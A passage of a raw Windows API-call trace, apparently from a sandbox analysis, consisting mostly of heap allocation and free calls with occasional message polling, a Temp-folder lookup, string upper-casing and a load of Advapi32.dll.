0x2aaa750 [0200.272] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa810 [0200.272] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77cd8 | out: hHeap=0x2af0000) returned 1 [0200.272] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72b18 | out: hHeap=0x2af0000) returned 1 [0200.272] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7e0 | out: hHeap=0x2af0000) returned 1 [0200.272] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0200.272] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa768 [0200.272] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72aa8 [0200.272] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa768 | out: hHeap=0x2af0000) returned 1 [0200.272] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77f08 [0200.272] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa5e8 [0200.272] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa600 [0200.272] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72b08 [0200.272] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77c38 [0200.272] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa768 [0200.272] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72b18 [0200.272] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa768 | out: hHeap=0x2af0000) returned 1 [0200.272] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77f58 [0200.272] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa6a8 [0200.272] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7e0 [0200.272] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72b28 [0200.272] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa5e8 | out: hHeap=0x2af0000) returned 1 [0200.272] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa5e8 [0200.273] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa618 [0200.273] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a730a8 [0200.273] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa630 [0200.273] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a730a8 | out: hHeap=0x2af0000) returned 1 [0200.273] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa630 | out: hHeap=0x2af0000) returned 1 [0200.273] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa618 | out: hHeap=0x2af0000) returned 1 [0200.273] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa5e8 | out: hHeap=0x2af0000) returned 1 [0200.273] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72b28 | out: hHeap=0x2af0000) returned 1 [0200.273] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa600 | out: hHeap=0x2af0000) returned 1 [0200.273] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72b08 | out: hHeap=0x2af0000) returned 1 [0200.273] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7e0 | out: hHeap=0x2af0000) returned 1 [0200.273] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa768 [0200.273] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7e0 [0200.273] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72b08 [0200.273] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77cb0 [0200.273] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa5e8 [0200.273] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72b28 [0200.273] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa5e8 | out: hHeap=0x2af0000) returned 1 [0200.273] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77b20 [0200.273] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa5e8 [0200.273] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa6d8 [0200.273] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a73068 [0200.273] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa768 | out: hHeap=0x2af0000) returned 1 [0200.273] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a73068 | out: hHeap=0x2af0000) returned 1 [0200.273] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7e0 | out: hHeap=0x2af0000) returned 1 [0200.273] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72b08 | out: hHeap=0x2af0000) returned 1 [0200.273] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa6d8 | out: hHeap=0x2af0000) returned 1 [0200.274] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77f08 | out: hHeap=0x2af0000) returned 1 [0200.274] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72aa8 | out: hHeap=0x2af0000) returned 1 [0200.274] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0200.274] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa600 [0200.274] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72aa8 [0200.274] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa600 | out: hHeap=0x2af0000) returned 1 [0200.274] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77c88 [0200.274] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa6d8 [0200.274] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa768 [0200.274] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72b08 [0200.274] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77f08 [0200.274] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7e0 [0200.274] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a730c8 [0200.274] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7e0 | out: hHeap=0x2af0000) returned 1 [0200.274] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77f30 [0200.274] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa600 [0200.274] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7e0 [0200.274] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77c88 | out: hHeap=0x2af0000) returned 1 [0200.274] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72aa8 | out: hHeap=0x2af0000) returned 1 [0200.274] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa6d8 | out: hHeap=0x2af0000) returned 1 [0200.274] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0200.274] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa618 [0200.274] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72aa8 [0200.274] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa618 | out: hHeap=0x2af0000) returned 1 [0200.274] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77cd8 [0200.274] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa618 [0200.274] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa630 [0200.275] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a73068 [0200.276] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77d00 [0200.276] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa6d8 [0200.276] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a730a8 [0200.276] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa6d8 | out: hHeap=0x2af0000) returned 1 [0200.276] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77c60 [0200.276] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa6d8 [0200.276] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa8e8 [0200.276] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a73118 [0200.276] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa618 | out: hHeap=0x2af0000) returned 1 [0200.276] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa618 [0200.277] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa8a0 [0200.277] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a73128 [0200.277] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa8d0 [0200.277] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a73128 | out: hHeap=0x2af0000) returned 1 [0200.277] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy/AppData/Local/Temp", lpFindFileData=0x8cf170 | out: lpFindFileData=0x8cf170*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x210ad1cc, ftCreationTime.dwHighDateTime=0x1d32742, ftLastAccessTime.dwLowDateTime=0x2e540d50, ftLastAccessTime.dwHighDateTime=0x1d5dff9, ftLastWriteTime.dwLowDateTime=0x2e540d50, ftLastWriteTime.dwHighDateTime=0x1d5dff9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Temp", cAlternateFileName="")) returned 0x9e2138 [0200.277] FindClose (in: hFindFile=0x9e2138 | out: hFindFile=0x9e2138) returned 1 [0200.277] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa8d0 | out: hHeap=0x2af0000) returned 1 [0200.277] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa8a0 | out: hHeap=0x2af0000) returned 1 [0200.277] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa618 | out: hHeap=0x2af0000) returned 1 [0200.277] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a73118 | out: hHeap=0x2af0000) returned 1 [0200.277] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa630 | out: hHeap=0x2af0000) returned 1 [0200.277] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a73068 | out: hHeap=0x2af0000) returned 1 [0200.277] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa8e8 | out: hHeap=0x2af0000) returned 1 [0200.278] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77cd8 | out: hHeap=0x2af0000) returned 1 [0200.278] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72aa8 | out: hHeap=0x2af0000) returned 1 [0200.278] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0200.278] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa9a8 [0200.278] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72aa8 [0200.278] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa9a8 | out: hHeap=0x2af0000) returned 1 [0200.278] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77c88 [0200.278] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa9a8 [0200.278] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaab28 [0200.278] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a73128 [0200.278] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77e90 [0200.278] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa8a0 [0200.278] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a73068 [0200.278] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa8a0 | out: hHeap=0x2af0000) returned 1 [0200.278] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77b48 [0200.278] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa858 [0200.278] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa870 [0200.278] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a73118 [0200.278] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa9a8 | out: hHeap=0x2af0000) returned 1 [0200.278] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaa20 [0200.278] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa8e8 [0200.278] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a715e8 [0200.278] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaac8 [0200.278] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a715e8 | out: hHeap=0x2af0000) returned 1 [0200.278] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaac8 | out: hHeap=0x2af0000) returned 1 [0200.278] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa8e8 | out: hHeap=0x2af0000) returned 1 [0200.278] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa20 | out: hHeap=0x2af0000) returned 1 [0200.279] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a73118 | out: hHeap=0x2af0000) returned 1 [0200.279] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaab28 | out: hHeap=0x2af0000) returned 1 [0200.279] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a73128 | out: hHeap=0x2af0000) returned 1 [0200.279] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa870 | out: hHeap=0x2af0000) returned 1 [0200.279] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77c88 | out: hHeap=0x2af0000) returned 1 [0200.279] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72aa8 | out: hHeap=0x2af0000) returned 1 [0200.279] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0200.279] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77c88 [0200.279] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72aa8 [0200.279] CharUpperBuffW (in: lpsz="A1100103809", cchLength=0xb | out: lpsz="A1100103809") returned 0xb [0200.279] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77c88 | out: hHeap=0x2af0000) returned 1 [0200.279] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72aa8 | out: hHeap=0x2af0000) returned 1 [0200.279] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaa960 [0200.279] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0200.279] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a73128 | out: hHeap=0x2af0000) returned 1 [0200.279] CharUpperBuffW (in: lpsz="SSA1100103809", cchLength=0xd | out: lpsz="SSA1100103809") returned 0xd [0200.279] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77d28 | out: hHeap=0x2af0000) returned 1 [0200.279] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a73128 | out: hHeap=0x2af0000) returned 1 [0200.279] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaab0 | out: hHeap=0x2af0000) returned 1 [0200.279] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaac8 | out: hHeap=0x2af0000) returned 1 [0200.279] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa918 | out: hHeap=0x2af0000) returned 1 [0200.279] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a73118 | out: hHeap=0x2af0000) returned 1 [0200.279] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72aa8 | out: hHeap=0x2af0000) returned 1 [0200.279] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0200.279] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e940 | out: hHeap=0x2af0000) returned 1 [0200.279] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0200.280] CharUpperBuffW (in: lpsz="A1A0070620F", cchLength=0xb | out: lpsz="A1A0070620F") returned 0xb [0200.280] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77d28 | out: hHeap=0x2af0000) returned 1 [0200.280] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a73118 | out: hHeap=0x2af0000) returned 1 [0200.280] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0200.280] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a715e8 | out: hHeap=0x2af0000) returned 1 [0200.280] CharUpperBuffW (in: lpsz="SSA1A0070620F", cchLength=0xd | out: lpsz="SSA1A0070620F") returned 0xd [0200.280] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77cd8 | out: hHeap=0x2af0000) returned 1 [0200.280] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71688 | out: hHeap=0x2af0000) returned 1 [0200.280] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaae0 | out: hHeap=0x2af0000) returned 1 [0200.280] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa8b8 | out: hHeap=0x2af0000) returned 1 [0200.280] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa08 | out: hHeap=0x2af0000) returned 1 [0200.280] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a73128 | out: hHeap=0x2af0000) returned 1 [0200.280] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a73118 | out: hHeap=0x2af0000) returned 1 [0200.280] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0200.280] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5eb40 | out: hHeap=0x2af0000) returned 1 [0200.280] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0200.280] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71688 | out: hHeap=0x2af0000) returned 1 [0200.280] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa918 | out: hHeap=0x2af0000) returned 1 [0200.280] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa8a0 | out: hHeap=0x2af0000) returned 1 [0200.280] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa870 | out: hHeap=0x2af0000) returned 1 [0200.280] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a73128 | out: hHeap=0x2af0000) returned 1 [0200.280] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a73118 | out: hHeap=0x2af0000) returned 1 [0200.280] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5dfa8 | out: hHeap=0x2af0000) returned 1 [0200.280] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa888 | out: hHeap=0x2af0000) returned 1 [0200.280] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a73128 | out: hHeap=0x2af0000) returned 1 [0200.280] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa918 | out: hHeap=0x2af0000) returned 1 [0200.280] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa8b8 | out: hHeap=0x2af0000) returned 1 [0200.280] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa9f0 | out: hHeap=0x2af0000) returned 1 [0200.280] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f70a0 | out: hHeap=0x2af0000) returned 1 [0200.280] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a73118 | out: hHeap=0x2af0000) returned 1 [0200.281] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72aa8 | out: hHeap=0x2af0000) returned 1 [0200.281] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0200.281] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa888 | out: hHeap=0x2af0000) returned 1 [0200.281] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa888 | out: hHeap=0x2af0000) returned 1 [0200.281] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa9c0 | out: hHeap=0x2af0000) returned 1 [0200.281] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a715e8 | out: hHeap=0x2af0000) returned 1 [0200.281] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x76390000 [0200.281] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa930 | out: hHeap=0x2af0000) returned 1 [0200.281] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa50 | out: hHeap=0x2af0000) returned 1 [0200.281] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa870 | out: hHeap=0x2af0000) returned 1 [0200.281] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a716e8 | out: hHeap=0x2af0000) returned 1 [0200.281] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa38 | out: hHeap=0x2af0000) returned 1 [0200.281] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a73118 | out: hHeap=0x2af0000) returned 1 [0200.281] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa80 | out: hHeap=0x2af0000) returned 1 [0200.281] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77c88 | out: hHeap=0x2af0000) returned 1 [0200.281] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72aa8 | out: hHeap=0x2af0000) returned 1 [0200.281] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0200.281] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72aa8 | out: hHeap=0x2af0000) returned 1 [0200.281] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0200.281] CharUpperBuffW (in: lpsz="A4E00B02826", cchLength=0xb | out: lpsz="A4E00B02826") returned 0xb [0200.281] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77c88 | out: hHeap=0x2af0000) returned 1 [0200.281] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72aa8 | out: hHeap=0x2af0000) returned 1 [0200.282] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a73118 | out: hHeap=0x2af0000) returned 1 [0200.282] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa9c0 | out: hHeap=0x2af0000) returned 1 [0200.282] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0200.282] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a715e8 | out: hHeap=0x2af0000) returned 1 [0200.282] CharUpperBuffW (in: lpsz="SSA4E00B02826", cchLength=0xd | out: lpsz="SSA4E00B02826") returned 0xd [0200.282] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77ee0 | out: hHeap=0x2af0000) returned 1 [0200.282] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a715e8 | out: hHeap=0x2af0000) returned 1 [0200.282] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa888 | out: hHeap=0x2af0000) returned 1 [0200.282] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa8a0 | out: hHeap=0x2af0000) returned 1 [0200.282] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa870 | out: hHeap=0x2af0000) returned 1 [0200.282] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71718 | out: hHeap=0x2af0000) returned 1 [0200.282] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71688 | out: hHeap=0x2af0000) returned 1 [0200.282] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0200.282] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e700 | out: hHeap=0x2af0000) returned 1 [0200.282] 